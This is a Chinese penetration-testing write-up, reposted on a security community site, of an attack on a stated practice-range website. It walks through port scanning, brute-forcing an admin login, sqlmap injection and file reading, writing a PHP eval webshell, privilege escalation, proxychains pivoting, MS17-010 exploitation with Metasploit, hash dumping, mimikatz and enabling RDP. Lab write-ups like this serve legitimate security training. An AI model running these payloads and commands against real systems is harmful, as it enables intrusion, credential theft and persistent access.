首页 >> 网络安全 >>渗透测试 >> 【渗透过程】嘉缘网站 --测试
详细内容

【渗透过程】嘉缘网站 --测试

声明:本片文章测试网站为测试靶场

信息收集阶段:

首先使用了一些常见的扫描工具:nmap  御剑

使用nmap扫描端口 发现网站开放了 135 139 445 3306 等端口

这里可以看到网站开放了一些危害较高端口:135 225等

1.png

使用御剑扫描到一些敏感信息:phpinfo页面  后台登录地址

2.png

可以从info页面直接看到网站的配置信息:网站绝对路径

3.png

当访问IP+80端口发现有探针,可从中看出网站的中间件等信息

(这里的phpmyadmin管理无法打开)

4.png

测试阶段:

信息收集完成后开始进一步测试

针对网站进行手工测试

在用户登录处发现,该网站没有对登录进行严格限制,而且可以通过返回错误信息发现网站存在哪些用户

5.png

根据返回信息可以发现网站有admin用户,尝试使用暴力破解

使用工具:BurpSuite

对用户名为admin的用户进行暴力破解 密码为弱口令 ,可以登录用户

6.png

继续测试发现网站存在SQL注入

7.png

尝试使用工具进行注入检测

使用工具:sqlmap

经过注入发现网站后台的用户名及密码 ,phpmyadmin的用户及密码

密码为密文,尝试解密发现只有data 和kefu用户可以解开

8.png

9.png

在注入时发现我们的权限可以进行读文件但是不可写,尝试通过读取配置文件获取root密码

读取文件需要网站绝对路劲,这是我们可以访问之前的info页面,获取绝对路径

10.png

尝试使用sqlmap进行读取文件 ,成功读取到root密码 (但是没有发现phpmyadmin的页面)

sqlmap -u "注入点的URL"  --file-read =“网站绝对路径/读取的文件“


11.png

在前端无法和会员登录后无法找到漏洞,尝试登陆后台继续测试

在使用data用户登录后发现为普通权限

在后台对每项功能进行测试发现有一个执行sql语句的模块

尝试使用sql语句进行写入一句话,发现写入成功

select "<?php eval($_POST[apple]);?>" into outfile "网站绝对路径/1.php"  //1.php 为写入一句话木马的文件名

在发现自己权限普通权限,尝试通过抓包获取包信息,发现存在越权漏洞(垂直)

使用工具:burp

通过burp抓取添加管理员的包,修改fr_admin_type=manage  发现成功添加超级管理员

12.png

使用菜刀(蚁剑)连接写入的一句话

13.png

这里讲一下提权,假如权限不高,需要进行提权

首先:查看服务器的操作系统

如果这里为win2003,可以找台2003的机器把cmd.exe程序上传到目标服务器

跳到该目录下执行cmd 你会发现权限权限有所提升,可以执行一下基础命令,但是还是无法执行新建用户,开启3389端口等命令

这时我们只需上传提权工具如pr 巴西烤肉等

使用提取权工具进行命令的执行,这样我们就达到提权的目的

14.png

15.png

接着上篇,当我们使用蚁剑进行执行Dos命令发现目标服务器存在2块网卡

(这里蚁剑如果无法执行命令,可以上传一个大马)

196.png

而且发现在238段下还有内网服务器

arp -a

17.png

需要进行挂代理,只有这样才能对内网服务器进行测试

代理设置:

(因为要对内网进行其他操作,所有这里只介绍如何给kali进行代理设置)

首先安装:

安装插件

20.png

安装完成后

这里需要通过菜刀或蚁剑上传所需的文件(网站为php站这里上传tunnel.php)

上传成功后进行监听 ,监听的终端不能关需要一直开启

21.png

22.png

再次开启一个终端  修改配置文件

23.png

把dynamic_chain前的#删掉

24.png

同时在最下方加入  socks5 127.0.0.1 9632(这里的9632为你上方监听的端口)之后退出保存

25.png

26.png

通过打开的网页访问内网IP 192.168.238.128  这时进行监听的终端开始跑了并成功显示探针 说明代理设置成功

27.png

如果监听的终端没有变化,网页也没显示,需要进行以下操作,之后再次从终端打开浏览器

如果还不成功,请关机,从新启动一下kali (修改的配置没有运行成功,需要重启)

添加路由 route add -net 192.168.90.0 netmask 255.255.255.0 dev eth0

route add -net 192.168.80.0 netmask 255.255.255.0 dev eth0

route add -net 192.168.90.0/24 gw 192.168.90.1

删除路由 route del -net 192.168.80.0 netmask 255.255.255.0 dev eth0

  

内网渗透

针对445端口

代理成功后,每此执行命令或使用软件时 在命令前加上 proxychains

之后使用nmap开始对 192.168.238.129   129.168.238.130 进行端口扫描

proxychains nmap -vvv -n -sT -PN 192.168.238.129

proxychains nmap -vvv -n -sT -PN 192.168.238.130

发现2个都开135 139 445端口  这里只对445进行   

192.168.238.129

30.png

192.168.238.130

31.png

对192.168.238.129:445

 使用kali的工具   

proxychains msfconsole   //启动MSF终端

32.png

使用攻击模块

search   option  //搜索相关工具和攻击载荷

use  use exploit/windows/smb/ms17_010_psexec  //启动该模块

show options    //查看相关信息

33.png

set RHOST  目标IP

set LHOST  本机IP

set threads 端口

exploit   //执行 或者用run

34.png

执行成功后会返回meterpreter  当执行命令有可能不会回显,因为有代理有可能返回的包会丢失 但是命令会执行

我们尝试直接利用 getuid 和 getsystem 命令来提权

35.png

使用命令获取hash值

run post/windows/gather/smart_hashdump

36.png

通过撞库得到administrator的密码  

37.png

使用得到密码和账户使用kaili的远程桌面进行连接

proxychains  rdesktop IP  //远程连接 目标机需要开启3389端口

38.png

run post/windows/manage/enable_rdp    //开启3389

run getgui -u xxxxx -p xxxxx          //添加用户

download c:\\1.txt                 //下载文件

upload ll.txt c:\                  //上传文件

cat  11.txt                       //查看文件

pwd                               //查询当前路径

sysinfo                          //显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息


介绍个神器 mimikatz :

   load mimikatz

   msv (获取 hash 值)

   ssp (获取明文信息)

   wdigest (获取系统账户信息)

   mimikatz_command -f a:: (必须要以错误的模块来让正确的模块显示)

   mimikatz_command -f hash:: (获取目标 hash)


如果直接使用开启3389端口命令无法执行的话,可以在本地生产一个木马文件通过上传一个木马文件

创建会话反弹会一个shell

从新开启一个终端

39.png

40.png

同时使用另一个终端上传生成的exe程序 并执行

41.png


作者:Shadow-G 

原文链接:

https://www.cnblogs.com/G-Shadow/p/10964374.html

https://www.cnblogs.com/G-Shadow/p/10965035.html#top

.
更多

1589982338979126.png


ots网络社区

www.ots-sec.cn

猜你喜欢
更多
联系方式
更多

投稿邮箱:1481840992@qq.com

交流群2群:622534175

ots网络社区3群:1078548359

关注我们
更多
技术支持: 建站ABC | 管理登录